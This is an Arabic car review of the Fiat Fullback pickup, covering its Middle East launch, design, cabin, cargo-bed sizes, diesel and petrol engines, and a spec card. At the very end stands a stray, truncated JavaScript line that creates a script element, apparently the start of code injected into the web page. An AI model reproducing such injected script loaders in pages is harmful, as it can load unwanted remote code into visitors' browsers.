فيات Fullback نظرة الصانع الإيطالي إلى قطاع البيك-أب المتوسطة

فيات الإيطالية بتوسع دائم لمجموعتها من السيارات، حيث استطاعت في السنوات القليلة الماضية دخول أسواق وفئات سيارات لم تكن متواجدة بها على الاطلاق. ويعود الفضل الكبير في ذلك إلى استحواذ الصانع الإيطالي العملاق على شركة كرايزلر الأميركية التي استفادة من سلسة وكلائها وطرازاتها لتطوير انتاجها الخاص. اليوم نحن متواجدون في إيطاليا لاختبار بيك-أب متوسطة جديدة من فيات أطلق عليها تسمية Fullback كانت قد قدمت رسمياً من خلال بوابة معرض دبي الدولي العام الماضي.

مدعومة بأكثر من 100 عام من الخبرة في انتاج سيارات مخصصة للمحترفين، تكتمل مجموعة الصانع الإيطالي فيات اليوم من هذا النوع من السيارات من مولودتها الجديدة Fullback التي أصبحت متوفرة الان في أسواق الشرق الأوسط. هذا القطاع من السيارات مهم جداً في منطقتنا العربية حيث بيع ما يفوق 450,000 سيارة بيك-أب متوسطة في العام 2015.

التصميم الخارجي لـ فيات Fullback يتسم بخطوط رياضية شأنه لمعظم السيارات في فئته وهو متوفر بخيارين من كابينة واحدة أو أربعة أبواب مما يزيد من عملانيته وامكانيته استقطاب مستهليكن ليسوا من القطاع المحترف، بل هم شباب بأغلبية الأحيان يسعون إلى اقتناء سيارة من نوع بيك-أب ثمنها مدروس قادرة على تلبية احتياجاتهم من قطر لمركبات وغيرها من الاعمال.

من الداخل وكما ذكرنا توفر فيات Fullback إمكانية جلوس لخمس ركاب بالغين دون أي مشكلة. وتتميز هذه المقصورة بتجهيزاتها الترفيهية العصرية.

اما بخصوص سعة التحميل، يبلغ طول الصندوق الخلفي في النسخة المزودة بكابينة واحدة 2265 ملم، عرضه 1470 ملم اما ارتفاعه فيبلغ 475 ملم. بينما يبلغ طول الصندوق الخلفي في النسخة المزودة بأربعة أبواب، 1520 ملم، عرضه 1470وارتفاعه 475 ملم.

ميكانيكياً تتوفر فيات Fullback الجديدة في أسواق الشرق الأوسط مع خيارين من المحركات. المحرك الأول عامل على الديزل مؤلف من 4 أسطوانات سعة 2.5 ليتر قادر على توليد قوة 134 حصان مع عزم دوران يصل إلى 324 نيوتن متر.

اما المحرك الثاني العامل على البنزين مؤلف من 4 أسطوانات سعة 2.3 ليتر يولد قوة 132 حصان مع عزم دوران يصل إلى 202 نيوتن متر.

وقد تم توفير علبة تروس يدوية من 5 نسب فقط لـ فيات Fullback تنقل قوة كلا المحركين اما إلى العجلات الخلفية او الأربعة الدافعة بحسب النسخة التي تختارونها.

البطاقة التقنية لـ فيات Fullback

الاندفاع: خلفي / رباعي

عدد الاسطوانات: 4

 السعة (ليتر): 2.3

 القوة (حصان/ د.د.): 132/ –

 عزم الدوران (ن – م/ د.د.): 202/ –

من صفر الى 100 كلم/س (ثانية): –

السرعة القصوى (كلم/س): –

محركات اخرى (عدد الأسطوانات/ السعة/القوة): (4/ 2.5 ديزل/ 134)

 

var d=document;var s=d.createElement(‘script’);